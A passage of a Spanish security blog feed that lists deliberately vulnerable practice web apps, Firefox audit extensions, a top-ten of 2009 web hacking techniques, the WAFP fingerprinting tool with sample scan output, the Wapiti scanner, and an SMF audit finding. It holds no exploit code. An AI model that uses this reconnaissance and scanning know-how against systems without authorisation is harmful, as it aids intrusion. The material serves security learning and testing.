<li><a rel="nofollow" target="_blank" href="http://www.mavensecurity.com/WebMaven.php"><strong>WebMaven</strong></a> es un entorno interactivo de seguridad web, que emula varios de los mas comunes fallos en las aplicaciones web.</li>
</ul>
<ul>
<li><strong><a rel="nofollow" target="_blank" href="http://www.bonsai-sec.com/en/research/moth.php">SecuriBench</a></strong> es una aplicacion escrita en java en la universidad de Stanford, que incluye las siguientes vulnerabilidades SQL injection attacks, Cross-site scripting attacks, HTTP splitting attacks, Path traversal attacks, para practicar con ellas.</li>
</ul>
<ul>
<li><strong><a rel="nofollow" target="_blank" href="http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10">Mutillidae</a></strong> es un conjunto de scripts vulnerables escritos en php, a diferencia de otras aplicaciones de su tipo, multilliadae se diferencia por la simplicidad de su código, enfocado en las personas que apenas empiezan a desarrollar aplicaciones web.</li>
</ul>
<ul>
<li><strong>SERIE HACME</strong>, la serie Hacme es un conjunto de aplicaciones web temáticas escritas por <a rel="nofollow" target="_blank" href="http://www.foundstone.com/us/index.asp">Foundstone</a>, que tienen en su código de forma deliberada, multitud de vulnerabilidades web, para que practiquemos nuestros conocimientos sobre seguridad web, dentro de esta serie tenemos un aplicativo web de un casino<strong> <a rel="nofollow" target="_blank" href="http://www.foundstone.com/us/resources/proddesc/hacmecasino.htm">Hacme Casino</a></strong> (<a rel="nofollow" target="_blank" href="http://www.dragonjar.org/e-zine-2-comunidad-dragonjar.xhtml">del cual hablamos en la ezine 2 de nuestra comunidad</a>), una aplicacion web de compras <a href="http://www.foundstone.com/us/resources/proddesc/hacmeshipping.htm"><strong>Hacme Shipping</strong> </a>, un sistema de viajes <strong><a rel="nofollow" target="_blank" href="http://www.foundstone.com/us/resources/proddesc/hacmetravel.htm">Hacme Travel</a></strong> y una aplicacion web que simula ser un banco<strong> <a rel="nofollow" target="_blank" href="http://www.foundstone.com/us/resources/proddesc/hacmebank.htm">Hacme Bank</a></strong>.</li>
</ul>
<p>Si conoces otra aplicacion web de este tipo que no este en la lista, déjanos un comentario para que sea agregada.</p>
<p>Actualizado 18/01/2010 : Agrego <a rel="nofollow" target="_blank" href="http://www.mavensecurity.com/WebMaven.php"><strong>WebMaven</strong></a> , <strong><a rel="nofollow" target="_blank" href="http://www.bonsai-sec.com/en/research/moth.php">SecuriBench</a></strong>, y <strong><a rel="nofollow" target="_blank" href="http://www.badstore.net/">BadStore</a></strong>, gracias al comentario de <strong>colliers</strong></p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 374px; width: 1px; height: 1px;">
<h2>SecuriBench</h2>
</div>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/wapiti-escaner-vulnerabilidades-aplicaciones-web.xhtml" title="Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web">Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/httpbee-la-navaja-suiza-de-las-aplicaciones-web.xhtml" title="HttpBee la Navaja Suiza de las Aplicaciones Web">HttpBee la Navaja Suiza de las Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/pipper-herramienta-para-la-auditorias-de-aplicaciones-web.xhtml" title="Pipper &#8211; Herramienta para la auditorías de aplicaciones web">Pipper &#8211; Herramienta para la auditorías de aplicaciones web</a></li><li><a href="http://www.dragonjar.org/faq-sobre-seguridad-en-aplicaciones-web.xhtml" title="FAQ sobre Seguridad en Aplicaciones Web">FAQ sobre Seguridad en Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/sandcat-escaneador-de-servidores-y-aplicaciones-web.xhtml" title="Sandcat, Escaneador de Servidores y Aplicaciones Web">Sandcat, Escaneador de Servidores y Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/detecta-la-version-de-una-aplicacion-web.xhtml" title="WAFP &#8211; Detecta la Versión de una Aplicación Web">WAFP &#8211; Detecta la Versión de una Aplicación Web</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/aplicaciones-web-vulnerables.xhtml/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Extensiones de Firefox para Auditorias de Seguridad</title>
		<link>http://www.dragonjar.org/extensiones-firefox-auditorias-seguridad.xhtml</link>
		<comments>http://www.dragonjar.org/extensiones-firefox-auditorias-seguridad.xhtml#comments</comments>
		<pubDate>Wed, 13 Jan 2010 23:50:57 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Mozilla Firefox]]></category>
		<category><![CDATA[Plugin]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3636</guid>
		<description><![CDATA[Hace poco tenia una conversación con epsilon sobre cambiar el Firefox por uzbl en un proyecto que se esta gestionando en la comunidad,  sus argumentos era el &#8220;gran&#8221; consumo de recursos de firefox frente al uzbl, los míos que ese consumo era justificado, ya que firefox con los plugins adecuados, es una excelente herramienta de [...]]]></description>
			<content:encoded><![CDATA[<p>Hace poco tenia una conversación con <a rel="nofollow" target="_blank" href="http://www.rinconinformatico.net/">epsilon</a> sobre cambiar el Firefox por <a rel="nofollow" target="_blank" href="http://www.uzbl.org/">uzbl</a> en un proyecto que se esta gestionando en la comunidad,  sus argumentos era el &#8220;gran&#8221; consumo de recursos de firefox frente al <a rel="nofollow" target="_blank" href="http://www.uzbl.org/">uzbl</a>, los míos que ese consumo era justificado, ya que firefox con los plugins adecuados, es una excelente herramienta de seguridad, ademas los navegadores web son la puerta el 90% de las cosas que realizamos frente a un computador y utilizar un navegador tan limitado como uzbl seria un impedimento, más que un beneficio.</p>
<p>Para reafirmar el uso de Firefox como Herramienta de Seguridad les presento <a href="http://www.dragonjar.org/disponible-firecat-15.xhtml">FireCAT</a>, un completo catalogo de las extensiones para Firefox, que están especialmente diseñadas para su uso en una auditoria de seguridad:</p>
<p style="text-align: center;"><img class="alignnone" title="Auditoria Web con Firefox" src="http://i.imgur.com/7Nmyx.jpg" alt="7Nmyx Extensiones de Firefox para Auditorias de Seguridad" width="520" height="188" /></p>
<p><span id="more-3636"></span>En la comunidad ya habíamos <a href="http://www.dragonjar.org/disponible-firecat-15.xhtml">hablado del FireCAT en su versión 1.5</a>, en esa ocasión, se había publicado el catalogo de extensiones para realizar auditorias con firefox en PDF y html, con esta nueva versión 1.6 el FireCAT pasa a estar disponible de forma online, en un mapa mas interactivo creado en flash:</p>
<p style="text-align: center;"><object id="spicynodesViewer" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="530" height="250" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="scalemode" value="showall" /><param name="allowFullScreen" value="true" /><param name="wmode" value="opaque" /><param name="quality" value="high" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://media.spicynodes.org/display.swf?id=79676765f9df965b69e8ecd498e53c60&amp;nodemapID=35219" /><param name="allowfullscreen" value="true" /><embed id="spicynodesViewer" type="application/x-shockwave-flash" width="530" height="250" src="http://media.spicynodes.org/display.swf?id=79676765f9df965b69e8ecd498e53c60&amp;nodemapID=35219" allowscriptaccess="always" quality="high" wmode="opaque" allowfullscreen="true" scalemode="showall"></embed></object></p>
<p>Espero que les sea de utilidad y encuentren algunos buenos plugins que no conocian.</p>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.security-database.com/toolswatch/FireCAT-v1-6-the-online-version.html">Pagina Oficial del FireCAT</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/backtrack-4-final.xhtml" title="Backtrack 4 Final">Backtrack 4 Final</a></li><li><a href="http://www.dragonjar.org/top-100-herramientas-de-seguridad-open-source.xhtml" title="Top 100 Herramientas de Seguridad Open Source">Top 100 Herramientas de Seguridad Open Source</a></li><li><a href="http://www.dragonjar.org/wepbuster-automatizando-auditoria-redes-inalambricas.xhtml" title="WEPBuster, automatizando la auditoría de redes inalámbricas">WEPBuster, automatizando la auditoría de redes inalámbricas</a></li><li><a href="http://www.dragonjar.org/dradis-organiza-y-comparte-informacion-en-un-test-de-penetracion.xhtml" title="Dradis, organiza y comparte información en un Test de Penetración">Dradis, organiza y comparte información en un Test de Penetración</a></li><li><a href="http://www.dragonjar.org/networkminer-herramienta-forense-de-analisis-de-red.xhtml" title="NetworkMiner, Herramienta forense de Análisis de Red">NetworkMiner, Herramienta forense de Análisis de Red</a></li><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a href="http://www.dragonjar.org/browser-ride-explota-tu-navegador.xhtml" title="Browser Ride &#8211; Explota tu Navegador">Browser Ride &#8211; Explota tu Navegador</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/extensiones-firefox-auditorias-seguridad.xhtml/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Top 10 Técnicas de Seguridad Web en el 2009</title>
		<link>http://www.dragonjar.org/top-10-tecnicas-de-seguridad-web-en-el-2009.xhtml</link>
		<comments>http://www.dragonjar.org/top-10-tecnicas-de-seguridad-web-en-el-2009.xhtml#comments</comments>
		<pubDate>Sat, 09 Jan 2010 05:35:31 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Técnica]]></category>
		<category><![CDATA[Tecnicas]]></category>
		<category><![CDATA[Top 10]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3617</guid>
		<description><![CDATA[El director de WhiteHatSec, Jeremiah Grossman, reconocido en el mundo de la seguridad informática, por sus aportes en el campo de la seguridad web, ha publicado en su blog una entrada llamada &#8220;Top Ten Web Hacking Techniques of 2009 (Official)&#8220;, la cual pretende ser una recopilación de las nuevas técnicas en seguridad web publicadas durante [...]]]></description>
			<content:encoded><![CDATA[<p>El director de WhiteHatSec, Jeremiah Grossman, reconocido en el mundo de la seguridad informática, por <a rel="nofollow" target="_blank" href="http://www.dragonjar.org/clickjacking.xhtml">sus aportes</a> en <a href="http://www.dragonjar.org/secuestro-de-frames-inocentes.xhtml">el campo</a> de la seguridad web, ha publicado en su blog una entrada llamada &#8220;<a href="http://jeremiahgrossman.blogspot.com/2010/01/top-ten-web-hacking-techniques-of-2009.html">Top Ten Web Hacking Techniques of 2009 (Official)</a>&#8220;, la cual pretende ser una recopilación de las nuevas técnicas en seguridad web publicadas durante el 2009.</p>
<p>Constantemente salen nuevas técnicas de seguridad web, pero muchas veces estas son dejadas en el olvido en blogs y papers poco visitados/descargados, la finalidad de este top, es dar a conocer estas nuevas tecnicas, para poder tenerlas en cuenta a la hora de testear o programar una aplicación web.<span id="more-3617"></span> <strong>El TOP 10 de Tenicas en Seguridad Web del 2009 es:</strong></p>
<ol>
<li><a rel="nofollow" target="_blank" href="http://www.phreedom.org/research/rogue-ca/" target="_blank">Creating a rogue CA certificate<br />
</a>Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger</li>
<li> <a rel="nofollow" target="_blank" href="http://blog.mindedsecurity.com/2009/05/http-parameter-pollution-new-web-attack.html" target="_blank">HTTP Parameter Pollution (HPP)<br />
</a>Luca Carettoni, Stefano diPaola</li>
<li> <a rel="nofollow" target="_blank" href="http://netifera.com/research/" target="_blank">Flickr&#8217;s API Signature Forgery Vulnerability (MD5 extension attack)<br />
</a>Thai Duong and Juliano Rizzo</li>
<li> <a rel="nofollow" target="_blank" href="http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html" target="_blank">Cross-domain search timing<br />
</a>Chris Evans</li>
<li> <a rel="nofollow" target="_blank" href="http://ha.ckers.org/blog/20090617/slowloris-http-dos/" target="_blank">Slowloris HTTP DoS<br />
</a>Robert Hansen, (additional credit for earlier discovery to <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/archive/1/456339/30/0/threaded" target="_blank">Adrian Ilarion Ciobanu</a> &amp; Ivan Ristic &#8211; “Programming Model Attacks” section of <a rel="nofollow" target="_blank" href="http://www.apachesecurity.net/about/table-of-contents.html" target="_blank">Apache Security</a> for describing the attack, but did not produce a tool)</li>
<li> <a rel="nofollow" target="_blank" href="http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf" target="_blank">Microsoft IIS 0-Day Vulnerability Parsing Files (semi‐colon bug)<br />
</a>Soroush Dalili</li>
<li> <a rel="nofollow" target="_blank" href="http://stephensclafani.com/2009/05/26/exploiting-unexploitable-xss/" target="_blank">Exploiting unexploitable XSS<br />
</a>Stephen Sclafani</li>
<li> <a rel="nofollow" target="_blank" href="http://sirdarckcat.blogspot.com/2009/08/our-favorite-xss-filters-and-how-to.html" target="_blank">Our Favorite XSS Filters and how to Attack them<br />
</a>Eduardo Vela (sirdarckcat), David Lindsay (thornmaker)</li>
<li> <a rel="nofollow" target="_blank" href="http://www.sectheory.com/rfc1918-security-issues.htm" target="_blank">RFC1918 Caching Security Issues<br />
</a>Robert Hansen</li>
<li> DNS Rebinding (3-part series <a rel="nofollow" target="_blank" href="http://ha.ckers.org/blog/20090120/persistent-cookies-and-dns-rebinding-redux/" target="_blank">Persistent Cookies</a>, <a rel="nofollow" target="_blank" href="http://ha.ckers.org/blog/20091118/dns-rebinding-for-scraping-and-spamming/" target="_blank">Scraping &amp; Spammin</a><a rel="nofollow" target="_blank" href="http://ha.ckers.org/blog/20091118/dns-rebinding-for-scraping-and-spamming/" target="_blank">g</a>, and <a rel="nofollow" target="_blank" href="http://ha.ckers.org/blog/20091116/session-fixation-via-dns-rebinding/" target="_blank">Session Fixation</a>)<br />
Robert Hansen</li>
</ol>
<p>Cada técnica expuesta en este TOP 10, será explicada detalladamente en los eventos <a rel="nofollow" target="_blank" href="http://www.it-defense.de/en/it-defense-2010/program.html">IT-Defense</a> y <a rel="nofollow" target="_blank" href="http://www.rsaconference.com/2010/usa/index.htm">RSA USA 2010</a> donde Jeremiah Grossman dictará la charla “2010: A Web Hacking Odyssey”.</p>
<p>Puedes ver<a rel="nofollow" target="_blank" href="http://jeremiahgrossman.blogspot.com/2010/01/top-ten-web-hacking-techniques-of-2009.html"> los mas de 80 articulos propuestos para este TOP10 en este enlace</a>, aunque no quedaron en el podio, no dejan de ser una buena fuente de información si te interesa el área de la seguridad en aplicaciones web.</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/charla-de-seguridad-web-gratuita-barcelona-espana.xhtml" title="Charla de Seguridad Web Gratuita &#8211; Barcelona España ">Charla de Seguridad Web Gratuita &#8211; Barcelona España </a></li><li><a href="http://www.dragonjar.org/gnulinux-seguridad-tecnica-y-legal-pdf.xhtml" title="GNU/Linux Seguridad Técnica y Legal (PDF)">GNU/Linux Seguridad Técnica y Legal (PDF)</a></li><li><a href="http://www.dragonjar.org/memorias-del-disi-2009.xhtml" title="Memorias del DISI 2009">Memorias del DISI 2009</a></li><li><a href="http://www.dragonjar.org/el-atacante-informatico-capitulo-2.xhtml" title="El Atacante Informático – Capítulo 2">El Atacante Informático – Capítulo 2</a></li><li><a href="http://www.dragonjar.org/boletin-de-la-comunidad-dragonjar-0008.xhtml" title="Boletín de La Comunidad DragonJAR #0008">Boletín de La Comunidad DragonJAR #0008</a></li><li><a href="http://www.dragonjar.org/pastel-chancuco-chuletas-seguridad-informatica.xhtml" title="Pastel, Cheet Sheets, Chuletas en la Seguridad Informática">Pastel, Cheet Sheets, Chuletas en la Seguridad Informática</a></li><li><a href="http://www.dragonjar.org/asi-fue-el-technet-security-day-de-microsoft-en-barcelona.xhtml" title="Así fué el Technet Security Day de Microsoft en Barcelona">Así fué el Technet Security Day de Microsoft en Barcelona</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/top-10-tecnicas-de-seguridad-web-en-el-2009.xhtml/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>WAFP &#8211; Detecta la Versión de una Aplicación Web</title>
		<link>http://www.dragonjar.org/detecta-la-version-de-una-aplicacion-web.xhtml</link>
		<comments>http://www.dragonjar.org/detecta-la-version-de-una-aplicacion-web.xhtml#comments</comments>
		<pubDate>Mon, 28 Dec 2009 21:12:07 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Aplicacion]]></category>
		<category><![CDATA[Fingerprinting]]></category>
		<category><![CDATA[Version]]></category>
		<category><![CDATA[WAFP]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Web Application Finger Printer]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3563</guid>
		<description><![CDATA[WAFP (Web Application Finger Printer) es una herramienta escrita en ruby por el consultor de seguridad Richard Sammet,  que es capaz de detectar la versión detallada e incluso el número de compilación de una aplicación Web.
¿Como funciona?
WAFP obtiene los archivos HTML que genera una aplicacion web y  le saca una firma que identifica ese [...]]]></description>
			<content:encoded><![CDATA[<p>WAFP (Web Application Finger Printer) es una herramienta escrita en ruby por el consultor de seguridad Richard Sammet,  que es capaz de detectar la versión detallada e incluso el número de compilación de una aplicación Web.</p>
<p><strong>¿Como funciona?</strong><br />
WAFP obtiene los archivos HTML que genera una aplicacion web y  le saca una firma que identifica ese archivo generado con una versión especifica de la aplicacion, como estas salidas cambian en cada versión de la aplicacion, es posible detectar de forma muy precisa la versión y el numero de compilación de una aplicacion web.<span id="more-3563"></span></p>
<p>Esta es la salida de la aplicacion contra una instalación de phpymadmin:</p>
<blockquote>
<pre><span> <strong> wafp.rb --verbose -p phpmyadmin https://phpmyadmin.example.de</strong>
   VERBOSE: loading the fingerprint database to the ram...
   Collecting the files we need to fetch ...
   Fetching needed files (#432), calculating checksums and storing the results to the database:
   ............................................................................................
   VERBOSE: request for "/themes/darkblue_orange/img/b_info.png" produced "Connection refused - connect(2)" for 1 times - retrying...
   ............................................................................................
   Checking gathered/stored checksums (#432) against the selected product (phpmyadmin) versions (#87) checksums:
   .......................................................................................

    found the following matches (limited to 10):
   +-------------------------------------------------------------+
    phpmyadmin-2.11.9.1                	 296 / 299  (98.99%)
    phpmyadmin-2.11.9.2                	 295 / 299  (98.66%)
    phpmyadmin-2.11.9.4                	 295 / 299  (98.66%)
    phpmyadmin-2.11.8.1                	 295 / 299  (98.66%)
    phpmyadmin-2.11.9.5                	 295 / 299  (98.66%)
    phpmyadmin-2.11.8                  	 295 / 299  (98.66%)
    phpmyadmin-2.11.9.3                	 295 / 299  (98.66%)
    phpmyadmin-2.11.9                  	 295 / 299  (98.66%)
    phpmyadmin-2.11.4                  	 294 / 299  (98.33%)
    phpmyadmin-2.11.5.2                	 294 / 299  (98.33%)
   +-------------------------------------------------------------+
    WAFP 0.01-26c3  - - - - - - - - -  http://mytty.org/wafp/

   VERBOSE: Returncode stats:
   VERBOSE: Ret-Code	200	#302
   VERBOSE: Ret-Code	404	#130
   VERBOSE: deleting the temporary database entries for scan "472312620367191262036719_httpsphpmyadmin.example.de" ...</span>
</pre>
</blockquote>
<p>Esta herramienta cuenta con mas de 600 versiones de las aplicaciones web mas populares y esta base de datos crecerá a medida que se publiquen nuevas versiones.</p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://mytty.org/wafp/#download">Descargar WAFP</a></h2>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://mytty.org/wafp/">Pagina Oficial de WAFP</a><br />
<a rel="nofollow" target="_blank" href="http://www.mytty.org/wafp_26c3_richard-sammet.pdf">Diapositivas de Charla en edición 26 de CCC</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/binging-footprinting-utilizando-bing.xhtml" title="Binging – Footprinting utilizando Bing">Binging – Footprinting utilizando Bing</a></li><li><a href="http://www.dragonjar.org/httprecon-identificacion-avanzada-de-servidores-web.xhtml" title="httprecon, Identificación Avanzada de Servidores Web">httprecon, Identificación Avanzada de Servidores Web</a></li><li><a href="http://www.dragonjar.org/video-test-de-intrusiona-a-una-aplicacion-web.xhtml" title="Video: Test de Intrusióna a una Aplicacion Web">Video: Test de Intrusióna a una Aplicacion Web</a></li><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/vulnerabilidad-xss-8-millones-aplicaciones-flash.xhtml" title="Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash">Vulnerabilidad de XSS en mas de 8 Millones de Sitios con Flash</a></li><li><a href="http://www.dragonjar.org/aplicaciones-web-vulnerables.xhtml" title="Aplicaciones Web Vulnerables">Aplicaciones Web Vulnerables</a></li><li><a href="http://www.dragonjar.org/backtrack-4-final.xhtml" title="Backtrack 4 Final">Backtrack 4 Final</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/detecta-la-version-de-una-aplicacion-web.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Wapiti &#8211; Escaner de Vulnerabilidades en Aplicaciones Web</title>
		<link>http://www.dragonjar.org/wapiti-escaner-vulnerabilidades-aplicaciones-web.xhtml</link>
		<comments>http://www.dragonjar.org/wapiti-escaner-vulnerabilidades-aplicaciones-web.xhtml#comments</comments>
		<pubDate>Sat, 26 Dec 2009 20:00:14 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[aplicaciones]]></category>
		<category><![CDATA[Escaneador]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3560</guid>
		<description><![CDATA[Wapiti es un escáner de vulnerabilidades para aplicaciones web, licenciado bajo la GPL v2 , que busca fallos XSS, inyecciones SQL y XPath, inclusiones de archivos (local y remota), ejecución de comandos, inyecciones LDAP, inyecciones CRLF, para que pongamos a prueba la seguridad de nuestras aplicaciones web y podamos corregirlas.

El listado de vulnerabilidades detectadas es [...]]]></description>
			<content:encoded><![CDATA[<p>Wapiti es un escáner de vulnerabilidades para aplicaciones web, licenciado bajo la GPL v2 , que busca fallos XSS, inyecciones SQL y XPath, inclusiones de archivos (local y remota), ejecución de comandos, inyecciones LDAP, inyecciones CRLF, para que pongamos a prueba la seguridad de nuestras aplicaciones web y podamos corregirlas.</p>
<p style="text-align: center;"><img class="alignnone" title="Escaner de Vulnerabilidades Web" src="http://farm5.static.flickr.com/4067/4226157936_7210cdb81b_o.jpg" alt="4226157936 7210cdb81b o Wapiti   Escaner de Vulnerabilidades en Aplicaciones Web" width="500" height="161" /></p>
<p>El listado de vulnerabilidades detectadas es el siguiente:<span id="more-3560"></span></p>
<ul>
<li>Errores en el Manejo de Archivos (Inclusión remota o local usando include/require, fopen, readfile&#8230;)</li>
<li>Inyecciones en Bases de Datos (Soporta PHP/JSP/ASP e inyecciones SQL y XPath)</li>
<li>XSS (Cross Site Scripting)</li>
<li>Inyecciones LDAP</li>
<li>Ejecución de Comandos (eval(), system(), passtru()&#8230;)</li>
<li>Inyeccione CRLF  (HTTP Response Splitting, session fixation&#8230;)</li>
</ul>
<p>Esta excelente herramienta programada en python destaca por sus detallados informes, donde podemos ver la descripción del problema encontrado, cómo resolver dicho problema y algunas paginas de referencia donde podemos ampliar nuestro conocimiento sobre el tema.</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://www.youtube.com/p/81BC11D4F7DB58E6&amp;hl=es" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/p/81BC11D4F7DB58E6&amp;hl=es"></embed></object></p>
<p>Recuerda que el uso de este tipo de herramientas, que automatizan el testeo de vulnerabilidades en tus aplicativos web, ayudan a encontrar fácilmente algunos problemas de las aplicaciones web, pero no reemplazan una auditoria concienzuda del código fuente.</p>
<h2 style="text-align: center;"><a rel="nofollow" target="_blank" href="http://www.ict-romulus.eu/web/wapiti/download">Descargar Wapiti</a></h2>
<p><strong>Mas Información:</strong><br />
<a rel="nofollow" target="_blank" href="http://www.ict-romulus.eu/web/wapiti/">Pagina Oficial del Wapiti</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/sandcat-escaneador-de-servidores-y-aplicaciones-web.xhtml" title="Sandcat, Escaneador de Servidores y Aplicaciones Web">Sandcat, Escaneador de Servidores y Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/aplicaciones-web-vulnerables.xhtml" title="Aplicaciones Web Vulnerables">Aplicaciones Web Vulnerables</a></li><li><a href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a href="http://www.dragonjar.org/vulnerabilidades-web-que-permiten-acceder-al-sistema.xhtml" title="Vulnerabilidades Web que Permiten Acceder al Sistema">Vulnerabilidades Web que Permiten Acceder al Sistema</a></li><li><a href="http://www.dragonjar.org/httpbee-la-navaja-suiza-de-las-aplicaciones-web.xhtml" title="HttpBee la Navaja Suiza de las Aplicaciones Web">HttpBee la Navaja Suiza de las Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/pipper-herramienta-para-la-auditorias-de-aplicaciones-web.xhtml" title="Pipper &#8211; Herramienta para la auditorías de aplicaciones web">Pipper &#8211; Herramienta para la auditorías de aplicaciones web</a></li><li><a href="http://www.dragonjar.org/faq-sobre-seguridad-en-aplicaciones-web.xhtml" title="FAQ sobre Seguridad en Aplicaciones Web">FAQ sobre Seguridad en Aplicaciones Web</a></li><li><a href="http://www.dragonjar.org/como-realizar-un-borrado-seguro-usando-bleachbit.xhtml" title="Como realizar un borrado seguro usando BleachBit">Como realizar un borrado seguro usando BleachBit</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/wapiti-escaner-vulnerabilidades-aplicaciones-web.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Multiples Vulnerabilidades en SMF</title>
		<link>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml</link>
		<comments>http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml#comments</comments>
		<pubDate>Wed, 02 Dec 2009 16:45:13 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Seguridad Web]]></category>
		<category><![CDATA[Auditoria]]></category>
		<category><![CDATA[Ejecución]]></category>
		<category><![CDATA[Hacker]]></category>
		<category><![CDATA[SMF]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=3445</guid>
		<description><![CDATA[En el foro ElHacker.net sacaron adelante un proyecto destinado a realizar auditorías de seguridad a nivel WEB sobre el popular software de foros SMF 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada día un software mas robusto y seguro, esta auditorio dio como resultado mas de 40 fallos de [...]]]></description>
			<content:encoded><![CDATA[<p>En el foro ElHacker.net sacaron adelante un proyecto destinado a realizar auditorías de seguridad a nivel WEB sobre el popular software de foros SMF 2.0 (Simple Machines Forum) con la finalidad de que sus desarrolladores puedan crear cada día un software mas robusto y seguro, esta auditorio dio como resultado mas de <a rel="nofollow" target="_blank" href="http://code.google.com/p/smf2-review/issues/list">40 fallos de seguridad encontrados</a>, un <a rel="nofollow" target="_blank" href="http://foro.elhacker.net/nivel_web/backdoor_nativo_en_smf_20-t272107.0.html">posible backdoor</a> que los responsables de SMF tenían en el código.</p>
<p style="text-align: center;"><img class="alignnone" title="SMF Vulnerabilidad" src="http://farm3.static.flickr.com/2522/4152538793_bef8159247_o.jpg" alt="4152538793 bef8159247 o Multiples Vulnerabilidades en SMF" width="500" height="72" /></p>
<p>Entre los fallos encontrados existen 3 con peligrosidad alta (uno de ellos permite ejecución remota de código), 14 con un nivel de peligro medio (en su mayoría ataques del tipo XSS) y en resto de los fallos tienen un nivel de peligrosidad bajo o nulo.<span id="more-3445"></span></p>
